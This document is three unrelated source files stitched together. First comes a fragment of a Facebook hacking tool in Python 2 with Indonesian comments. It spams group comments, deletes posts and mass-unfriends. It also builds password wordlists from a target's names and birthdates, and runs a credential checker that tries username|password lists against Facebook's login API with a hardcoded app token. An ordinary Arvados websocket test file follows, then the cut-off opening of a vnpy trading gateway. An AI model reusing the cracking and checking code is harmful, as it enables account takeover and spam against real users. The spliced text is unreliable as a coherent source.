r=requests.get('https://graph.facebook.com/group/?id='+ide+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
try:
p = requests.get("https://graph.facebook.com/v3.0/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
a = json.loads(p.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post("https://graph.facebook.com/"+f+"/comments?message="+km+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+km[:10].replace('\n',' ')+'... \033[1;92m]'
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(komengrup))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### HAPUS POST #####
def deletepost():
os.system('reset')
try:
toket=open('login.txt','r').read()
nam = requests.get('https://graph.facebook.com/me?access_token='+toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print("\033[1;91m[+] \033[1;92mFrom \033[1;91m: \033[1;97m%s"%nama)
jalan("\033[1;91m[+] \033[1;92mStart\033[1;97m ...")
print 42*"\033[1;97m═"
asu = requests.get('https://graph.facebook.com/me/feed?access_token='+toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/'+id+'?method=delete&access_token='+toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\033[1;91m[\033[1;97m'+id[:10].replace('\n',' ')+'...'+'\033[1;91m] \033[1;95mFailed'
except TypeError:
print '\033[1;92m[\033[1;97m'+id[:10].replace('\n',' ')+'...'+'\033[1;92m] \033[1;96mDeleted'
piro += 1
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] Connection Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### ACCEPT FRIEND #####
def accept():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
r = requests.get('https://graph.facebook.com/me/friendrequests?limit='+limit+'&access_token='+toket)
teman = json.loads(r.text)
if '[]' in str(teman['data']):
print"\033[1;91m[!] No friend request"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for i in teman['data']:
gas = requests.post('https://graph.facebook.com/me/friends/'+i['from']['id']+'?access_token='+toket)
a = json.loads(gas.text)
if 'error' in str(a):
print "\033[1;97m[ \033[1;91mFailed\033[1;97m ] "+i['from']['name']
else:
print "\033[1;97m[ \033[1;92mAccept\033[1;97m ] "+i['from']['name']
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### UNFRIEND ####
def unfriend():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print "\033[1;97mStop \033[1;91mCTRL+C"
print 42*"\033[1;97m═"
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete("https://graph.facebook.com/me/friends?uid="+id+"&access_token="+toket)
print "\033[1;97m[\033[1;92m Deleted \033[1;97m] "+nama
except IndexError: pass
except KeyboardInterrupt:
print "\033[1;91m[!] Stopped"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
print"\n\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
#### LAIN LAIN #####
# #
####MENU LAIN#####
def lain():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Create Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Create Wordlist"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Account Checker"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m See my group list"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Profile Guard"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
pilih_lain()
#////////////
def pilih_lain():
other = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if other =="":
print "\033[1;91m[!] Wrong input"
pilih_lain()
elif other =="1":
status()
elif other =="2":
wordlist()
elif other =="3":
check_akun()
elif other =="4":
grupsaya()
elif other =="5":
guard()
elif other =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
pilih_lain()
##### STATUS #####
def status():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
msg=raw_input('\033[1;91m[+] \033[1;92mType status \033[1;91m:\033[1;97m ')
if msg == "":
print "\033[1;91m[!] Don't be empty"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
else:
res = requests.get("https://graph.facebook.com/me/feed?method=POST&message="+msg+"&access_token="+toket)
op = json.loads(res.text)
jalan('\033[1;91m[✺] \033[1;92mCreate \033[1;97m...')
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mStatus ID\033[1;91m : \033[1;97m"+op['id']
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
########### CREATE WORDLIST ##########
def wordlist():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.system('reset')
print logo
print "\033[1;91m[?] \033[1;92mFill in the complete data of the target below"
print 42*"\033[1;97m═"
a = raw_input("\033[1;91m[+] \033[1;92mNama Depan \033[1;97m: ")
file = open(a+".txt", 'w')
b=raw_input("\033[1;91m[+] \033[1;92mNama Tengah \033[1;97m: ")
c=raw_input("\033[1;91m[+] \033[1;92mNama Belakang \033[1;97m: ")
d=raw_input("\033[1;91m[+] \033[1;92mNama Panggilan \033[1;97m: ")
e=raw_input("\033[1;91m[+] \033[1;92mTanggal Lahir >\033[1;96mex: |DDMMYY| \033[1;97m: ")
f=e[0:2]
g=e[2:4]
h=e[4:]
print 42*"\033[1;97m═"
print("\033[1;91m[?] \033[1;93mKalo Jomblo SKIP aja :v")
i=raw_input("\033[1;91m[+] \033[1;92mNama Pacar \033[1;97m: ")
j=raw_input("\033[1;91m[+] \033[1;92mNama Panggilan Pacar \033[1;97m: ")
k=raw_input("\033[1;91m[+] \033[1;92mTanggal Lahir Pacar >\033[1;96mex: |DDMMYY| \033[1;97m: ")
jalan('\033[1;91m[✺] \033[1;92mCreate \033[1;97m...')
l=k[0:2]
m=k[2:4]
n=k[4:]
file.write("%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s" % (a,c,a,b,b,a,b,c,c,a,c,b,a,a,b,b,c,c,a,d,b,d,c,d,d,d,d,a,d,b,d,c,a,e,a,f,a,g,a,h,b,e,b,f,b,g,b,h,c,e,c,f,c,g,c,h,d,e,d,f,d,g,d,h,e,a,f,a,g,a,h,a,e,b,f,b,g,b,h,b,e,c,f,c,g,c,h,c,e,d,f,d,g,d,h,d,d,d,a,f,g,a,g,h,f,g,f,h,f,f,g,f,g,h,g,g,h,f,h,g,h,h,h,g,f,a,g,h,b,f,g,b,g,h,c,f,g,c,g,h,d,f,g,d,g,h,a,i,a,j,a,k,i,e,i,j,i,k,b,i,b,j,b,k,c,i,c,j,c,k,e,k,j,a,j,b,j,c,j,d,j,j,k,a,k,b,k,c,k,d,k,k,i,l,i,m,i,n,j,l,j,m,j,n,j,k))
wg = 0
while (wg < 100):
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while (en < 100):
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while (word < 100):
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while (gen < 100):
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print 42*"\033[1;97m═"
print ("\033[1;91m[+] \033[1;92mSaved \033[1;91m: \033[1;97m %s.txt" %a)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except IOError, e:
print("\033[1;91m[!] Failed")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### CHECKER #####
def check_akun():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[?] \033[1;92mCreate in file\033[1;91m : \033[1;97musername|password"
print 42*"\033[1;97m═"
live = []
cek = []
die = []
try:
file = raw_input("\033[1;91m[+] \033[1;92mFile path \033[1;91m:\033[1;97m ")
list = open(file,'r').readlines()
except IOError:
print ("\033[1;91m[!] File not found")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
pemisah = raw_input("\033[1;91m[+] \033[1;92mSeparator \033[1;91m:\033[1;97m ")
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for meki in list:
username, password = (meki.strip()).split(str(pemisah))
url = "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(username)+"&locale=en_US&password="+(password)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print"\033[1;97m[ \033[1;92mLive\033[1;97m ] \033[1;97m"+username+"|"+password
elif 'www.facebook.com' in mpsh["error_msg"]:
cek.append(password)
print"\033[1;97m[ \033[1;93mCheck\033[1;97m ] \033[1;97m"+username+"|"+password
else:
die.append(password)
print"\033[1;97m[ \033[1;91mDie\033[1;97m ] \033[1;97m"+username+"|"+password
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mTotal\033[1;91m : \033[1;97mLive=\033[1;92m"+str(len(live))+" \033[1;97mCheck=\033[1;93m"+str(len(cek))+" \033[1;97mDie=\033[1;91m"+str(len(die))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### GRUP SAYA #####
def grupsaya():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token='+toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p["name"]
id = p["id"]
f=open('out/Grupid.txt','w')
listgrup.append(id)
f.write(id + '\n')
print "\033[1;97m[ \033[1;92mMyGroup\033[1;97m ] "+str(id)+" => "+str(nama)
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m %s"%(len(listgrup))
print("\033[1;91m[+] \033[1;92mSaved \033[1;91m: \033[1;97mout/Grupid.txt")
f.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except KeyError:
os.remove('out/Grupid.txt')
print('\033[1;91m[!] Group not found')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No Connection"
keluar()
except IOError:
print "\033[1;91m[!] Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### PROFIL GUARD #####
def guard():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Activate"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Not activate"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
g = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if g == "1":
aktif = "true"
gaz(toket, aktif)
elif g == "2":
non = "false"
gaz(toket, non)
elif g =="0":
lain()
elif g =="":
keluar()
else:
keluar()
def get_userid(toket):
url = "https://graph.facebook.com/me?access_token=%s"%toket
res = requests.get(url)
uid = json.loads(res.text)
return uid["id"]
def gaz(toket, enable = True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {"Content-Type" : "application/x-www-form-urlencoded", "Authorization" : "OAuth %s" % toket}
url = "https://graph.facebook.com/graphql"
res = requests.post(url, data = data, headers = headers)
print(res.text)
if '"is_shielded":true' in res.text:
os.system('reset')
print logo
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mActivate"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
elif '"is_shielded":false' in res.text:
os.system('reset')
print logo
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;91mNot activate"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
else:
print "\033[1;91m[!] Error"
keluar()
lisensi()
|
test_events.py
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from future import standard_library
standard_library.install_aliases()
from builtins import range
from builtins import object
import logging
import mock
import queue
import sys
import threading
import time
import unittest
import arvados
from . import arvados_testutil as tutil
from . import run_test_server
class WebsocketTest(run_test_server.TestCaseWithServers):
MAIN_SERVER = {}
TIME_PAST = time.time()-3600
TIME_FUTURE = time.time()+3600
MOCK_WS_URL = 'wss://[{}]/'.format(tutil.TEST_HOST)
TEST_TIMEOUT = 10.0
def setUp(self):
self.ws = None
def tearDown(self):
try:
if self.ws:
self.ws.close()
except Exception as e:
print("Error in teardown: ", e)
super(WebsocketTest, self).tearDown()
run_test_server.reset()
def _test_subscribe(self, poll_fallback, expect_type, start_time=None, expected=1):
run_test_server.authorize_with('active')
events = queue.Queue(100)
# Create ancestor before subscribing.
# When listening with start_time in the past, this should also be retrieved.
# However, when start_time is omitted in subscribe, this should not be fetched.
ancestor = arvados.api('v1').humans().create(body={}).execute()
filters = [['object_uuid', 'is_a', 'arvados#human']]
if start_time:
filters.append(['created_at', '>=', start_time])
self.ws = arvados.events.subscribe(
arvados.api('v1'), filters,
events.put_nowait,
poll_fallback=poll_fallback,
last_log_id=(1 if start_time else None))
self.assertIsInstance(self.ws, expect_type)
self.assertEqual(200, events.get(True, 5)['status'])
human = arvados.api('v1').humans().create(body={}).execute()
want_uuids = []
if expected > 0:
want_uuids.append(human['uuid'])
if expected > 1:
want_uuids.append(ancestor['uuid'])
log_object_uuids = []
while set(want_uuids) - set(log_object_uuids):
log_object_uuids.append(events.get(True, 5)['object_uuid'])
if expected < 2:
with self.assertRaises(queue.Empty):
# assertEqual just serves to show us what unexpected
# thing comes out of the queue when the assertRaises
# fails; when the test passes, this assertEqual
# doesn't get called.
self.assertEqual(events.get(True, 2), None)
def test_subscribe_websocket(self):
self._test_subscribe(
poll_fallback=False, expect_type=arvados.events.EventClient, expected=1)
@mock.patch('arvados.events.EventClient.__init__')
def test_subscribe_poll(self, event_client_constr):
event_client_constr.side_effect = Exception('All is well')
self._test_subscribe(
poll_fallback=0.25, expect_type=arvados.events.PollClient, expected=1)
def test_subscribe_poll_retry(self):
api_mock = mock.MagicMock()
n = []
def on_ev(ev):
n.append(ev)
error_mock = mock.MagicMock()
error_mock.resp.status = 0
error_mock._get_reason.return_value = "testing"
api_mock.logs().list().execute.side_effect = (
arvados.errors.ApiError(error_mock, b""),
{"items": [{"id": 1}], "items_available": 1},
arvados.errors.ApiError(error_mock, b""),
{"items": [{"id": 1}], "items_available": 1},
)
pc = arvados.events.PollClient(api_mock, [], on_ev, 15, None)
pc.start()
while len(n) < 2:
time.sleep(.1)
pc.close()
def test_subscribe_websocket_with_start_time_past(self):
self._test_subscribe(
poll_fallback=False, expect_type=arvados.events.EventClient,
start_time=self.localiso(self.TIME_PAST),
expected=2)
@mock.patch('arvados.events.EventClient.__init__')
def test_subscribe_poll_with_start_time_past(self, event_client_constr):
event_client_constr.side_effect = Exception('All is well')
self._test_subscribe(
poll_fallback=0.25, expect_type=arvados.events.PollClient,
start_time=self.localiso(self.TIME_PAST),
expected=2)
def test_subscribe_websocket_with_start_time_future(self):
self._test_subscribe(
poll_fallback=False, expect_type=arvados.events.EventClient,
start_time=self.localiso(self.TIME_FUTURE),
expected=0)
@mock.patch('arvados.events.EventClient.__init__')
def test_subscribe_poll_with_start_time_future(self, event_client_constr):
event_client_constr.side_effect = Exception('All is well')
self._test_subscribe(
poll_fallback=0.25, expect_type=arvados.events.PollClient,
start_time=self.localiso(self.TIME_FUTURE),
expected=0)
def test_subscribe_websocket_with_start_time_past_utc(self):
self._test_subscribe(
poll_fallback=False, expect_type=arvados.events.EventClient,
start_time=self.utciso(self.TIME_PAST),
expected=2)
def test_subscribe_websocket_with_start_time_future_utc(self):
self._test_subscribe(
poll_fallback=False, expect_type=arvados.events.EventClient,
start_time=self.utciso(self.TIME_FUTURE),
expected=0)
def utciso(self, t):
return time.strftime('%Y-%m-%dT%H:%M:%SZ', time.gmtime(t))
def localiso(self, t):
return time.strftime('%Y-%m-%dT%H:%M:%S', time.localtime(t)) + self.isotz(-time.timezone//60)
def isotz(self, offset):
"""Convert minutes-east-of-UTC to RFC3339- and ISO-compatible time zone designator"""
return '{:+03d}:{:02d}'.format(offset//60, offset%60)
# Test websocket reconnection on (un)execpted close
def _test_websocket_reconnect(self, close_unexpected):
run_test_server.authorize_with('active')
events = queue.Queue(100)
logstream = tutil.StringIO()
rootLogger = logging.getLogger()
streamHandler = logging.StreamHandler(logstream)
rootLogger.addHandler(streamHandler)
filters = [['object_uuid', 'is_a', 'arvados#human']]
filters.append(['created_at', '>=', self.localiso(self.TIME_PAST)])
self.ws = arvados.events.subscribe(
arvados.api('v1'), filters,
events.put_nowait,
poll_fallback=False,
last_log_id=None)
self.assertIsInstance(self.ws, arvados.events.EventClient)
self.assertEqual(200, events.get(True, 5)['status'])
# create obj
human = arvados.api('v1').humans().create(body={}).execute()
# expect an event
self.assertIn(human['uuid'], events.get(True, 5)['object_uuid'])
with self.assertRaises(queue.Empty):
self.assertEqual(events.get(True, 2), None)
# close (im)properly
if close_unexpected:
self.ws.ec.close_connection()
else:
self.ws.close()
# create one more obj
human2 = arvados.api('v1').humans().create(body={}).execute()
# (un)expect the object creation event
if close_unexpected:
log_object_uuids = []
for i in range(0, 2):
event = events.get(True, 5)
if event.get('object_uuid') != None:
log_object_uuids.append(event['object_uuid'])
with self.assertRaises(queue.Empty):
self.assertEqual(events.get(True, 2), None)
self.assertNotIn(human['uuid'], log_object_uuids)
self.assertIn(human2['uuid'], log_object_uuids)
else:
with self.assertRaises(queue.Empty):
self.assertEqual(events.get(True, 2), None)
# verify log message to ensure that an (un)expected close
log_messages = logstream.getvalue()
closeLogFound = log_messages.find("Unexpected close. Reconnecting.")
retryLogFound = log_messages.find("Error during websocket reconnect. Will retry")
if close_unexpected:
self.assertNotEqual(closeLogFound, -1)
else:
self.assertEqual(closeLogFound, -1)
rootLogger.removeHandler(streamHandler)
def test_websocket_reconnect_on_unexpected_close(self):
self._test_websocket_reconnect(True)
def test_websocket_no_reconnect_on_close_by_user(self):
self._test_websocket_reconnect(False)
# Test websocket reconnection retry
@mock.patch('arvados.events._EventClient.connect')
def test_websocket_reconnect_retry(self, event_client_connect):
event_client_connect.side_effect = [None, Exception('EventClient.connect error'), None]
logstream = tutil.StringIO()
rootLogger = logging.getLogger()
streamHandler = logging.StreamHandler(logstream)
rootLogger.addHandler(streamHandler)
run_test_server.authorize_with('active')
events = queue.Queue(100)
filters = [['object_uuid', 'is_a', 'arvados#human']]
self.ws = arvados.events.subscribe(
arvados.api('v1'), filters,
events.put_nowait,
poll_fallback=False,
last_log_id=None)
self.assertIsInstance(self.ws, arvados.events.EventClient)
# simulate improper close
self.ws.on_closed()
# verify log messages to ensure retry happened
log_messages = logstream.getvalue()
found = log_messages.find("Error 'EventClient.connect error' during websocket reconnect.")
self.assertNotEqual(found, -1)
rootLogger.removeHandler(streamHandler)
@mock.patch('arvados.events._EventClient')
def test_subscribe_method(self, websocket_client):
filters = [['object_uuid', 'is_a', 'arvados#human']]
client = arvados.events.EventClient(
self.MOCK_WS_URL, [], lambda event: None, None)
client.subscribe(filters[:], 99)
websocket_client().subscribe.assert_called_with(filters, 99)
@mock.patch('arvados.events._EventClient')
def test_unsubscribe(self, websocket_client):
filters = [['object_uuid', 'is_a', 'arvados#human']]
client = arvados.events.EventClient(
self.MOCK_WS_URL, filters[:], lambda event: None, None)
client.unsubscribe(filters[:])
websocket_client().unsubscribe.assert_called_with(filters)
@mock.patch('arvados.events._EventClient')
def test_run_forever_survives_reconnects(self, websocket_client):
connected = threading.Event()
websocket_client().connect.side_effect = connected.set
client = arvados.events.EventClient(
self.MOCK_WS_URL, [], lambda event: None, None)
forever_thread = threading.Thread(target=client.run_forever)
forever_thread.start()
# Simulate an unexpected disconnect, and wait for reconnect.
close_thread = threading.Thread(target=client.on_closed)
close_thread.start()
self.assertTrue(connected.wait(timeout=self.TEST_TIMEOUT))
close_thread.join()
run_forever_alive = forever_thread.is_alive()
client.close()
forever_thread.join()
self.assertTrue(run_forever_alive)
self.assertEqual(2, websocket_client().connect.call_count)
class PollClientTestCase(unittest.TestCase):
TEST_TIMEOUT = 10.0
class MockLogs(object):
def __init__(self):
self.logs = []
self.lock = threading.Lock()
self.api_called = threading.Event()
def add(self, log):
with self.lock:
self.logs.append(log)
def return_list(self, num_retries=None):
self.api_called.set()
args, kwargs = self.list_func.call_args_list[-1]
filters = kwargs.get('filters', [])
if not any(True for f in filters if f[0] == 'id' and f[1] == '>'):
# No 'id' filter was given -- this must be the probe
# to determine the most recent id.
return {'items': [{'id': 1}], 'items_available': 1}
with self.lock:
retval = self.logs
self.logs = []
return {'items': retval, 'items_available': len(retval)}
def setUp(self):
self.logs = self.MockLogs()
self.arv = mock.MagicMock(name='arvados.api()')
self.arv.logs().list().execute.side_effect = self.logs.return_list
# our MockLogs object's "execute" stub will need to inspect
# the call history to determine X in
# ....logs().list(filters=X).execute():
self.logs.list_func = self.arv.logs().list
self.status_ok = threading.Event()
self.event_received = threading.Event()
self.recv_events = []
def tearDown(self):
if hasattr(self, 'client'):
self.client.close(timeout=None)
def callback(self, event):
if event.get('status') == 200:
self.status_ok.set()
else:
self.recv_events.append(event)
self.event_received.set()
def build_client(self, filters=None, callback=None, last_log_id=None, poll_time=99):
if filters is None:
filters = []
if callback is None:
callback = self.callback
self.client = arvados.events.PollClient(
self.arv, filters, callback, poll_time, last_log_id)
def was_filter_used(self, target):
return any(target in call[-1].get('filters', [])
for call in self.arv.logs().list.call_args_list)
def test_callback(self):
test_log = {'id': 12345, 'testkey': 'testtext'}
self.logs.add({'id': 123})
self.build_client(poll_time=.01)
self.client.start()
self.assertTrue(self.status_ok.wait(self.TEST_TIMEOUT))
self.assertTrue(self.event_received.wait(self.TEST_TIMEOUT))
self.event_received.clear()
self.logs.add(test_log.copy())
self.assertTrue(self.event_received.wait(self.TEST_TIMEOUT))
self.assertIn(test_log, self.recv_events)
def test_subscribe(self):
client_filter = ['kind', '=', 'arvados#test']
self.build_client()
self.client.unsubscribe([])
self.client.subscribe([client_filter[:]])
self.client.start()
self.assertTrue(self.status_ok.wait(self.TEST_TIMEOUT))
self.assertTrue(self.logs.api_called.wait(self.TEST_TIMEOUT))
self.assertTrue(self.was_filter_used(client_filter))
def test_unsubscribe(self):
should_filter = ['foo', '=', 'foo']
should_not_filter = ['foo', '=', 'bar']
self.build_client(poll_time=0.01)
self.client.unsubscribe([])
self.client.subscribe([should_not_filter[:]])
self.client.subscribe([should_filter[:]])
self.client.unsubscribe([should_not_filter[:]])
self.client.start()
self.logs.add({'id': 123})
self.assertTrue(self.status_ok.wait(self.TEST_TIMEOUT))
self.assertTrue(self.event_received.wait(self.TEST_TIMEOUT))
self.assertTrue(self.was_filter_used(should_filter))
self.assertFalse(self.was_filter_used(should_not_filter))
def test_run_forever(self):
self.build_client()
self.client.start()
forever_thread = threading.Thread(target=self.client.run_forever)
forever_thread.start()
self.assertTrue(self.status_ok.wait(self.TEST_TIMEOUT))
self.assertTrue(forever_thread.is_alive())
self.client.close()
forever_thread.join()
del self.client
|
xtp_gateway.py
|
from typing import Any, Sequence
from datetime import datetime
from threading import Thread
from vnpy.api.xtp.vnxtp import (
XTP,
set_async_callback_exception_handler,
AsyncDispatchException,
OrderBookStruct,
XTPMarketDataStruct,
XTPQuoteStaticInfo,
XTPRspInfoStruct,
XTPSpecificTickerStruct,
XTPTickByTickStruct,
XTPTickerPriceInfo,
XTPOrderInsertInfo,
XTPOrderInfo,
XTPTradeReport,
XTPOrderCancelInfo,
XTPCrdDebtInfo,
XTPQueryStkPositionRsp,
XTPQueryAssetRsp,
XTPStructuredFundInfo,
XTPFundTransferNotice,
XTPQueryETFBaseRsp,
XTPQueryETFComponentRsp,
XTPQueryIPOTickerRsp,
XTPQueryIPOQuotaRsp,
XTPQueryOptionAuctionInfoRsp,
XTP_EXCHANGE_TYPE,
XTP_LOG_LEVEL,
XTP_PROTOCOL_TYPE,
XTP_TE_RESUME_TYPE,
XTP_SIDE_BUY,
XTP_SIDE_SELL,
XTP_SIDE_MARGIN_TRADE,
XTP_SIDE_SHORT_SELL,
XTP_SIDE_REPAY_MARGIN,
XTP_SIDE_REPAY_STOCK,
XTP_ACCOUNT_TYPE,
XTP_BUSINESS_TYPE,
XTP_TICKER_TYPE,
XTP_MARKET_TYPE,
XTP_PRICE_TYPE,
XTP_ORDER_STATUS_TYPE
)
from vnpy.event import EventEngine
from vnpy.trader.event import EVENT_TIMER
from vnpy.trader.constant import Exchange, Product, Direction, OrderType, Status, Offset
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.object import (CancelRequest, OrderRequest, SubscribeRequest,
TickData, ContractData, OrderData, TradeData,
PositionData, AccountData)
from vnpy.trader.utility import get_folder_path
API = XTP.API
EXCHANGE_XTP2VT = {
XTP_EXCHANGE_TYPE.XTP_EXCHANGE_SH: Exchange.SSE,
XTP_EXCHANGE_TYPE.XTP_EXCHANGE_SZ: Exchange.SZSE,
}
EXCHANGE_VT2XTP = {v: k for k, v in EXCHANGE_XTP2VT.items()}
MARKET_XTP2VT = {
XTP_MARKET_TYPE.XTP_MKT_SH_A: Exchange.SSE,
XTP_MARKET_TYPE.XTP_MKT_SZ_A: Exchange.SZSE
}
MARKET_VT2XTP = {v: k for k, v in MARKET_XTP2VT.items()}
PRODUCT_XTP2VT = {
XTP_TICKER_TYPE.XTP_TICKER_TYPE_STOCK: Product.EQUITY,
XTP_TICKER_TYPE.XTP_TICKER_TYPE_INDEX: Product.INDEX,
XTP_TICKER_TYPE.XTP_TICKER_TYPE_FUND: Product.FUND,
